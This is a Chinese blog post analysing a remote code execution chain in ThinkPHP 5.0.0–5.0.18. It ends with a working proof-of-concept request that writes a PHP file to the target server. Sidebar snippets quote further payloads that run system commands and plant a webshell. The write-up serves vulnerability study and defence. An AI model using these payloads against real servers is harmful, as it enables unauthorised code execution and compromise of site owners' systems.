[代码审计]ThinkPHP5.0.0-5.0.18RCE另类利用姿势

最新推荐文章于 2023-04-11 16:18:15 发布
最新推荐文章于 2023-04-11 16:18:15 发布
阅读量1.3k 收藏
点赞数 2
分类专栏: # PHP代码审计 # ThinkPHP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/115893304
版权

前言

网上看到的POC,我详细分析了路由和poc,是对一个姿势的利用,比较骚的是::可以调用非静态方法以及set_error_handler的使用

Trick

比较骚的是我们一直以为php当中::只能调用静态方法,但是非静态一定条件下也能成功调用

成功输出123虽然有报错

<?php
class A{
    public $a;
    public function y4tacker(){
        echo 123;
    }
}

A::y4tacker();

失败

<?php
class A{
    public $a;
    public function y4tacker(){
        $this->a = '123';
        echo 123;
    }
}

A::y4tacker();

分析

首先利用点是利用thinkphp/library/think/Request.php中的$value = call_user_func($filter, $value);来执行任意函数之后我们可以利用thinkphp/library/think/view/driver/Php.php当中的eval('?>' . $content);实现任意命令执行从而实现Shell的写入

再往上看,我们需要找到调用了filterValue方法的地方,在thinkphp/library/think/Request.php当中有

if (is_array($data)) {
            array_walk_recursive($data, [$this, 'filterValue'], $filter);
            reset($data);
        } else {
            $this->filterValue($data, $name, $filter);
        }

并且这个filter参数是由$filter = $this->getFilter($filter, $default);获取而来,我们跟踪这个函数

protected function getFilter($filter, $default)
    {
        if (is_null($filter)) {
            $filter = [];
        } else {
            $filter = $filter ?: $this->filter;
            if (is_string($filter) && false === strpos($filter, '/')) {
                $filter = explode(',', $filter);
            } else {
                $filter = (array) $filter;
            }
        }

        $filter[] = $default;
        return $filter;
    }

我们可以利用控制filter参数为空返回$this->filter,并且这个参数可控,之前的文章就分析过了,这里再简单提一下吧,在Request.php当中的method方法当中,可以控制$this->method__construct实现变量覆盖

$this->{$this->method}($_POST);

因此我们回到正题,首先get传入的s=captcha&g=implode是为了设置dispatch为method,我们稍微跟一下这个过程的关键步骤

首先调用self::routeCheck($request, $config);

之后进入$result = Route::check($request, $path, $depr, $config['url_domain_deploy']);

在这里插入图片描述

关键是这里,我们跟进

在这里插入图片描述

这里返回_construct

在这里插入图片描述

在这里对Request类初始化覆盖赋值

在这里插入图片描述

最终返回$this->method也就是GET,至于为什么非得传他,因为我们需要进入这个方法,所以必须得有路由参数

在这里插入图片描述

由于我们需要获取这个captcha路由规则

在这里插入图片描述

可以看到这里得到路由route这很重要

在这里插入图片描述

我们接着往下跟踪到checkRule

在这里插入图片描述

由于route路由为\think\captcha\CaptchaController@index很明显因此返回method

在这里插入图片描述

当然我们不一定使用captcha,其他路由也行,但是captcha在这里是万能的QAQ,毕竟每个TP5都自带了,我们继续返回APP.php,跟进

在这里插入图片描述

此时参数为

在这里插入图片描述

我们继续跟进Request的param

在这里插入图片描述

这里参数合并

在这里插入图片描述

我们继续跟进

在这里插入图片描述

进入Request的input方法也就回到了我们上面说的利用array_walk_recursive执行任意类方法了,

在这里插入图片描述

他对 d a t a 中 每 一 个 参 数 迭 代 运 行 data中每一个参数迭代运行 datafileter当中的方法

在这里插入图片描述

这里面还有一个比较巧妙的地方是set_error_handler的使用, tp5 默认就调用了 error_reporting(E_ALL) ,且有一套内置的错误处理机制。上面预期解也提到了即使报了 warning 程序也会中止执行。set_error_handler() 函数设置用户自定义的错误处理程序,会绕过标准 PHP 错误处理程序。其他的还有set_exception_handler() 函数设置用户自定义的异常处理函数。register_shutdown_function() 函数会注册一个会在PHP中止时执行的函数

POC

URL地址
url/public/?s=captcha&g=implode
POST数据
path=PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ3k0dGFja2VyLnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOyA/Pg==&_method=__construct&filter[]=set_error_handler&filter[]=self::path&filter[]=base64_decode&filter[]=\think\view\driver\Php::Display&method=GET

成功写入phpinfo,利用成功

在这里插入图片描述

Y4tacker
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
Thinkphp5.0.x_RCE复现&5.0.24反序列化大礼包
大博的博客
08-07 5868
环境部署 以TP5.0.22为例 + PHP 5.6.27-NTS + phpstorm2020.1 反序列化环境为:TP5.0.24 + PHP 5.6.27-NTS + phpstorm2020.1 漏洞成因 现在TP的RCE通常将其分成两类: Request类其中变量被覆盖导致RCE 路由控制不严谨导致可以调用任意类致使RCE 反序列化的应用(需要存在反序列化的地方) Request类其中变量被覆盖导致RCE 我们以这个POC为例,进行复现: 我们正常的代码逻辑已经简单的写在了前文,如有代码执行疑
ThinkPHP漏洞合集(专注渗透视角)
LainWith的博客
04-11 6264
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
记录笔记
04-12 464
ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8089/index.php?s=captcha会出现如下报错 F12进入开发者 用HackBar 插件发送 POST 请求 得到回显: 通过echo命令写入 Webshell 文件 首先将一句话木马进行 Base64 编码 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE
复现ThinkPHP5 5.0.23远程代码执行漏洞
weixin_56513549的博客
02-21 3264
访问/index.php?s=captcha页面,会出现如下报错: 执行whoami 查看当前目录 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd 写入一句话木马并访问 aaabbb 这里使用Base64 编码: _method=__construct&filter[]=system&method=get&server[RE...
ThinkPHP 5.0.* 远程代码执行漏洞
公众号shadow sock7
01-16 7385
5.0.23搭建环境。 payload如下: POST /thinkphp_5.0.23/public/index.php?s=captcha HTTP/1.1 Host: 192.168.170.186 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Geck...
ThinkPHP框架漏洞 远程代码执行/SQL注入/信息泄露复现(附检测工具)
告白的博客
02-24 4793
ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展。
thinkphp5的漏洞
https://www.cnblogs.com/zpchcbd/
04-10 1235
文件包含: http://ip/index.php?s=captcha&m=1 post提交: _method=__construct&filter[]=think__include_file&get[]=/home/www/test3/public/1.txt&method=get&server[]= 代码执行漏洞: http://bugbank.51vi...
ThinkPHP5 5.0.23远程代码执行漏洞复现
weixin_52347768的博客
03-28 6607
漏洞介绍: ThinkPHP5.0.23版本的漏洞:获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 漏洞复现+挂马: 使用御剑对网址进行扫描,进入到主页面 判断是否存在漏洞,访问/index.php?s=captcha页面,会出现报错 使用hackbar插件发送post请求:执行whoami命令 _method=__construct&filter[]=system&method=ge.
漏洞通告ThinkPHP远程代码执行漏洞
05-05
【漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x , 可以利用poc直接检测目标网站是否存在漏洞
Thinkphp开发--集成极光推送
10-19
极光推送(JPush)是独立的第三方云推送平台,致力于为全球移动应用开发者提供专业、高效的移动消息推送服务。本文讲述如何在将极光推送合到ThinkPHP框架中,
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
[CTFSHOW]命令执行
热门推荐
Y4tacker的博客
11-20 1万+
文章目录web 29web 30web 31web32web40参考文章 web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 我这里只想到五种简便的方法: 通配符 payload1:c=syst
[漏洞利用] CVE-2016-7124 漏洞复现(总结自一CTF题目)
Y4tacker的博客
07-21 1万+
文章目录漏洞影响的版本漏洞利用方法演示漏洞复现案例代码正常效果修改参数后的效果 漏洞影响的版本 从官网得知 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞利用方法 若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 演示 可能上面说的有点抽象就拿我今天遇到一道题来做个案例,运行下图 <?php cla
[代码审计]PHP中session的存储方式(WP)
Y4tacker的博客
08-02 8903
前言:引用了各路大佬参考资料,整合成自己能够看懂并接受的笔记,欢迎指正,前面先总结Session的常用知识,后面展开对题目WP的讲解 文章目录SESSION的常用知识基本概念要点Session基本介绍Session工作原理一些与解题相关基本概念session存储的方式session存储格式(序列化)session如何将session存入数据库并使用session的存储位置session存储的默认文件名PHP Session 基本函数的介绍WP部分参考文献 SESSION的常用知识 基本概念 要点 保存在
[代码审计]PHP代码审计之create_function()函数
Y4tacker的博客
08-02 7862
前言:引用了各路大佬参考资料,整合成自己能够看懂并接受的笔记,欢迎指正 学习一点小知识: // 这是 PHP 单行注释 /*这是 PHP 多行注释*/ /*直接注释掉后面所有代码` 文章目录create_function()简介基本使用代码片段运行截图分析代码注入案例案例一案例二参考资料--欢迎考证 create_function()简介 适用范围:PHP 4> = 4.0.1,PHP 5,PHP 7 功能:根据传递的参数创建匿名函数,并为其返回唯一名称。 语法: create_function(st
[SQL绕过]md5($str,true)类型绕过----题目来源CTFSHOW---web9
Y4tacker的博客
08-05 6944
起初不管输入什么都没有回显,访问robots.txt 下载查看源代码 <?php $flag=""; $password=$_POST['password']; if(strlen($password)>10){ die("password error"); } $sql="select * from user where username ='admin' and password ='".md5($password,true)."'"; $resu
poc-yaml-thinkphp5023-method-rce poc1
最新发布
07-29
poc-yaml-thinkphp5023-method-rce poc1 是一种潜在的安全漏洞利用程序,利用该程序可以对使用 ThinkPHP 5.0.23 版本的应用进行远程代码执行攻击。 ThinkPHP 是一款常用的 PHP 框架,版本 5.0.23 存在一个命令行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值